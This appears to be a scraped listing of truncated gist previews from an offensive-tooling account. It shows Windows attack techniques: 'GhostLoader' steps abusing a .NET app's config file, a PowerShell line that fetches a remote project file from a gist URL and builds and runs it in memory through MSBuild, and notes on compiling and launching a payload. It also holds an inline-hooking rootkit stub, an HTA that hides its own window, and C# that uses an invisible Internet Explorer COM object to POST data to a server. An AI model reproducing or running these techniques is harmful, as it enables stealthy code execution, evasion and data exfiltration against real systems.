GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
//Base64 Raw Decoder | |
function Base64Decode(str) { | |
if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string'); | |
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; | |
var o1, o2, o3, h1, h2, h3, h4, bits, d=[]; | |
for (var c=0; c<str.length; c+=4) { // unpack four hexets into three octets |
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
Basic gist after running PS script statements: | |
- Loads C# project from file or web URL | |
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] | |
- Launch program (payload) |
In-memory PowerShell XSLT project build: | |
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); | |
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj") | |
$e=new-object Microsoft.Build.Evaluation.Project($proj); | |
$e.build(); |
#include <windows.h> | |
#include <stdio.h> | |
FARPROC fpCreateProcessW; | |
BYTE bSavedByte; | |
// Blog Post Here: | |
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
// tasklist | findstr explore.exe |
<?xml version='1.0'?> | |
<data> | |
<circle> | |
<radius>12</radius> | |
</circle> | |
<circle> | |
<radius>37.5</radius> | |
</circle> | |
</data> |
# first: mkdir user && cd user && cp /path/to/get_gists.py . | |
# python3 get_gists.py user | |
import requests | |
import sys | |
from subprocess import call | |
user = sys.argv[1] | |
r = requests.get('https://api.github.com/users/{0}/gists'.format(user)) |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
using System; | |
using System.IO; | |
using System.Net; | |
using System.Text; | |
using System.IO.Compression; | |
using System.Collections.Generic; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
<html> | |
<head> | |
<script language="JScript"> | |
// HTA skeleton taken from https://github.com/zerosum0x0/koadic | |
window.resizeTo(1, 1); | |
window.moveTo(-2000, -2000); | |
window.blur(); | |
try | |
{ |
// sample function that takes in a destination server, POST data, and custom HTTP request headers | |
private string SendData(string dst, byte[] postData, string customHeaders) | |
{ | |
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046")); | |
object IE = Activator.CreateInstance(com_type); | |
object[] falseArr = new object[] { false }; | |
object[] trueArr = new object[] { true }; | |
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr); | |
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr); |